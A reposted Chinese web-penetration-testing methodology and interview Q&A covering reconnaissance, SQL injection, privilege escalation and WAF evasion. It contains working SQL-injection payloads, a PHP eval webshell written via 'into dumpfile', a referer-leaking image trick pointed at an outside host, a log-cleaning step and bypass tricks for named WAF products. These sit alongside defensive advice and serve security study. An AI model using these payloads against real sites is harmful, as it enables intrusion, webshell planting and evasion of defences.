你是如何渗透一个网站的?

以下内容来自 i 春秋社区

在获取书面授权的前提下。

00x0 信息收集

  1. 获取域名的whois信息,获取注册者邮箱姓名电话等。
  2. 查询服务器旁站以及子域名站点,因为主站一般比较难,所以先看看旁站有没有通用的cms或者其他漏洞。
  3. 查看服务器操作系统版本,web中间件,看看是否存在已知的漏洞,比如 IIS、Apache、Nginx 的解析漏洞。
  4. 查看 IP,进行IP地址端口扫描,对响应的端口进行漏洞探测,比如rsync、心脏出血、MySQL、FTP、SSH弱口令等。
  5. 扫描网站目录结构,看看是否可以遍历目录,或者敏感文件泄露,比如PHP探针。
  6. Google hack 进一步探测网站的信息、后台、敏感文件。

00x1 漏洞扫描

开始检测漏洞,如XSS、CSRF、SQL注入、代码执行、命令执行、越权访问、目录读取、任意文件读取/下载、文件包含。

远程命令执行、弱口令、上传、编辑器漏洞、暴力破解等。

00x2 漏洞利用

利用以上方式拿到 webshell,或者其它权限。

00x3 权限提升

提权服务器,比如 windows下的MySQL的UDF提权,windows低版本的漏洞,如IIS6.0,PR,巴西烤肉。

Linux藏牛漏洞,Linux内核版本漏洞提权,Linux下的MySQL system提权以及Oracle低权限提权。

00x4 日志清理

00x5 总结报告及修复方案

00x6 常见问题解析

  1. SQL注入的几种类型
  • 报错注入
  • 布尔注入
  • 延时注入
  • 宽字节注入
  1. 报错函数有哪些?
  • 1
    and extractvalue(1, concat(0x7e,(select @@version),0x7e))
  • 通过 floor 报错,向下取整。

  • 1
    +and updatexml(1, concat(0x7e,(secect@@version),0x7e),1)
  • 1
    .geometrycollection()select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));
  • 1
    .multipoint()select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));
  • 1
    .polygon()select * from test where id=1 and polygon((select * from(select * from(select user())a)b));
  • 1
    .multipolygon()select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));
  • 1
    .linestring()select * from test where id=1 and linestring((select * from(select * from(select user())a)b));
  • 1
    .multilinestring()select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));
  • 1
    .exp()select * from test where id=1 and exp(~(select * from(select user())a));
  1. 延时注入如何来判断?
  • 1
    if(ascii(substr(“hello”, 1, 1))=104, sleep(5), 1)
  1. 盲注和延时注入的共同点?

都是一个字符一个字符的判断。

  1. 如何拿一个网站的 webshell?

上传,后台编辑模块,SQL注入写文件,命令执行,代码执行,一些已经爆出cms的漏洞,比如dedecms后台可以直接建立脚本文件,wordpress上传插件包含脚本文件zip压缩包等等。

  1. SQL注入写文件都有哪些函数?
  • select ‘ 一句话 ‘ into outfile ‘ 路径 ‘
  • select ‘ 一句话 ’ into dumpfile ‘ 路径 ‘
  • select ‘ <?php eval($_POST[1]) ?> ‘ into dumpfile ‘ d:wwwroot\xxx.com\shellcode.php ‘;
  1. 如何防止CSRF?
  • 验证 referer
  • 验证 token
  1. OWASP 漏洞都有哪些?
  • SQL注入
  • 失效的身份认证和回话管理
  • 跨站脚本攻击 XSS
  • 直接引用不安全的对象
  • 安全配置错误
  • 敏感信息泄露
  • 缺少功能级的访问控制
  • 跨站请求伪造 CSRF
  • 使用含有已知漏洞的组件
  • 未验证的重定向和转发
  1. SQL注入防护方法?
  • 使用安全的 API
  • 对输入的特殊字符进行Escape转义处理
  • 使用白名单来规范化输入验证方法
  • 对客户端进行输入控制,不允许输入SQL注入相关的特殊字符
  • 服务器端在提交数据库进行SQL查询之前,对特殊字符进行过滤、转义、替换、删除。
  1. 代码执行,文件读取,命令执行的函数都有哪些?
  • 代码执行:eval ,preg_replace+/e assert ,call_user_func , call_user_func_array ,creat_function
  • 文件读取:file_get_contents() ,highlight_file() ,fopen() ,read file() ,fread() ,fgetss()
  • 命令执行:system() ,exec() ,shell_exec() ,passthru() ,pcntl_exec() ,popen() ,proc_open()
  1. Img 标签除了onerror 属性外,还有其他获取管理员路径的办法吗?

src 指定一个远程的脚本文件,获取 referer

  1. Img 标签除了onerror 属性外,并且 src 属性的后缀名必须以 .jpg 结尾,怎么获取管理员路径。

远程服务器修改阿帕奇配置文件,配置 .jpg 文件以 php方式解析。

AddType application/x-httpd-php .jpg

<img src=http://xss.tv/1.jpg> 会以php方式来解析。

  1. 代码审计

审计函数

  1. 绕过 WAF
  • 关键字可以用 % ( 只限于 IIS 系列 ) 。比如 select ,可以 sel%e%ct。原理:网络层WAF对SEL%E%CT进行URL编码后变成SEL%E%CT,匹配select失败,而进行asp.dll对SEL%E%CT进行URL解码却变成select。IIS下的asp.dll文件在对asp文件后参数进行URL解码时,会直接过滤掉09-0d(09是tab键,0d是回车)、20(空格)、%(后两个字符有一个不是十六进制)字符。XSS也是同理。

  • 通杀的,内联注释。安全狗不拦截,但是安全宝、加速乐、D盾,看到/*!/

    就尴尬了,所以只限于安全狗。比如 /*!select*/

  • 编码。这个方法对WAF很有效果,因为一般WAF会解码,但是我们利用这个特点,进行两次编码,他解了第一次但是不会解第二次,就bypass了。腾讯WAF、百度WAF等等都可以这样bypass的。

  • 伪造搜索引擎:早些版本的安全狗是有这个漏洞的,就是把User_Agent修改为搜索引擎。

  • 参数绕过,复制参数,比如 id=1&id=1

  • 用一些特殊字符代替空格,比如在MySQL中%0a是换行,可以代替空格,这个方法也可以部分绕过最新版本的安全狗,在SQLServe中可以用/*/代替空格。

  • 内联注释

  1. 宽字节注入怎么解决?

在初始化连接和字符集之后,使用SET character_set_client=binary 来设定客户端的字符集是二进制的。修改windows下的MySQL配置文件一般是my.ini,Linux下的MySQL配置文件一般是my.cnf,比如:mysql_query(“SETcharacter_set_client=binary”);character_set_client指定的是SQL语句的编码,如果设置为 binary,MySQL就以二进制来执行,这样宽字节编码问题就没有用武之地了。

我们一直都向往,面朝大海,春暖花开。 但是几人能做到,心中有爱,四季不败?